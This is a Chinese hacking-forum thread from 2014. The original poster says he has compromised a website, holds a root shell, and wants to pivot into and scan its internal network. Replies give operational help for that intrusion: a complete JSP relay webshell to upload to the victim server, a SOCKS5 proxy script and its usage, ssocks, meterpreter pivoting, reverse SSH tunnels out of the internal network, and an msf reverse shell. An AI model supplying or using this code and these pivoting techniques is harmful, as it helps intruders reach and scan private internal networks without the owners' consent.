关于linux shell 内网如何做代理

疯子 (世人笑我太疯癫,我笑世人看不穿。) | 2014-05-30 20:24

最近渗透一个网站 拿到一个shell root权限 已提权

现在想渗透内网 想做一个代理并且扫描内网 可是一直找不到怎么做内网代理 求个好方法 谢谢 !

有好方法的或者成功的 WB 感谢!

[原文地址]

各种吐槽:

1#

梧桐雨 (‮ofni.uygnotuw‮) | 2014-05-30 20:29

如果想漫游内网的话 在服务器上弄个sock5代理就好了。

参考例子:

http://zone.wooyun.org/content/1693

linux基本上支持python的,只要支持,那么可以试试80vul的 python socks5代理。客户端推荐用:Proxycap

如果是php,就很简单了,很多代理可扫描内网的。百度一下就有许多,结合自己实际情况改改就可以用了。

2#

梧桐雨 (‮ofni.uygnotuw‮) | 2014-05-30 20:31

80vul 的 socks5代理用法 python 文件名 你想要开的端口

例子 : python socks5.py 9999

3#

疯子 (世人笑我太疯癫,我笑世人看不穿。) | 2014-05-30 20:37

@梧桐雨 每次都是妹子你来帮我,都不知道怎么说了,小小的1WB不成敬意!

4#

xiaoL (http://www.xlixli.net) | 2014-05-30 20:37

@梧桐雨 梧桐雨什么的最有爱了

5#

疯子 (世人笑我太疯癫,我笑世人看不穿。) | 2014-05-30 20:38

还有好的想法的 小伙伴们也共享出来 我们一起漫游内网!

6#

疯子 (世人笑我太疯癫,我笑世人看不穿。) | 2014-05-30 20:39

@梧桐雨 恩 我这个是JAVA的tomcat jsp 所以我试一下80vul的 谢谢!

7#

梧桐雨 (‮ofni.uygnotuw‮) | 2014-05-30 20:43

@疯子 jsp一个很简单的proxy,只要用力把它甩到目标服务器上,然后这么访问:proxy.jsp?http://10.0.10.10 就可以进行漫游了,不过有些内部资源可能加载不出来。 

<%@page session="false"%>
<%@page import="java.net.*,java.io.*" %>
<%
try {
  String reqUrl = request.getQueryString();
  
  URL url = new URL(reqUrl);
  HttpURLConnection con = (HttpURLConnection)url.openConnection();
  con.setDoOutput(true);
  con.setRequestMethod(request.getMethod());
  int clength = request.getContentLength();
  if(clength > 0) {
    con.setDoInput(true);
    byte[] idata = new byte[clength];
    request.getInputStream().read(idata, 0, clength);
    con.getOutputStream().write(idata, 0, clength);
  }
  response.setContentType(con.getContentType());

  BufferedReader rd = new BufferedReader(new InputStreamReader(con.getInputStream()));
  String line;
  while ((line = rd.readLine()) != null) {
    out.println(line); 
  }
  rd.close();

} catch(Exception e) {
  response.setStatus(500);
}
%>

把上面的代码保存成jsp就可以了。

8#

疯子 (世人笑我太疯癫,我笑世人看不穿。) | 2014-05-30 20:45

@梧桐雨 好的 我主要还是要做扫描 所以还是用socks5 谢谢!

9#

冷冷的夜 (预备唱:希望你过的没我好,死得比我早,吃不好也睡不) | 2014-05-30 21:35

meterpreter

10#

DM_ (http://x0day.me) | 2014-05-30 22:39

meta_ssh

11#

Kuuki | 2014-05-30 22:43

@疯子 丢一个ssocks-0.0.14.tar.gz进去 之前用过 感觉不错

12#

laterain | 2014-05-30 23:00

ssh 做socks4代理,稳定,不漏气

没有破解密码吗?请移步http://drops.wooyun.org/tips/1951

13#

疯子 (世人笑我太疯癫,我笑世人看不穿。) | 2014-05-30 23:24

@Kuuki 刚刚用了 发现存在一个问题 我是路由器上网的 ssocks 无法代理到我的内网 端口映射也不行 不知什么问题

14#

wefgod (求大牛指点) | 2014-05-30 23:44

@laterain 洞主说的是内网。

15#

Kuuki | 2014-05-31 00:00

@疯子 应该没问题。我当时也是路由上网,我还是映射到我虚拟机里呢,你把dmz那些关了,只开端口映射

16#

乌帽子 (和狗咬在一起的,终究还是狗!) | 2014-05-31 00:53

meterpreter+povit+socks4

17#

Sct7p | 2014-05-31 02:32

SSH

18#

Xser (一枚屌丝) | 2014-05-31 07:29

用msf直接生成一个shell,然后反弹就是了

留言评论(旧系统):

moonfly @ 2014-06-01 00:41:55

都搞到root shell了,直接ssh tunnel就可以在本机起socks5代理了;本地Proxycap 想怎么扫就怎么扫!

本站回复:

好方法!

flowind @ 2014-06-01 20:31:34

看完评论..难道shell root就是ssh??? 难道不能是反弹提权后的shell? 有内网的root shell权限不一定能连接上ssh.. 一般情况下..连接上ssh的几率不超过10%.. 都知道把服务器放在路由后面,咋可能还会开放ssh对外连接???

本站回复:

内网这个情况确实挺蛋疼的。

moonfly @ 2014-06-05 22:15:16

内网服务器只要可以主动连接任意一个外网的TCP port,就可以ssh反弹出来到自己的server上,然后反向从本地再发起ssh tunnel一样是可以在本地用socks代理任意漫游对方内网的;楼上的太小瞧ssh的威力了!

本站回复:

哈哈,学到了!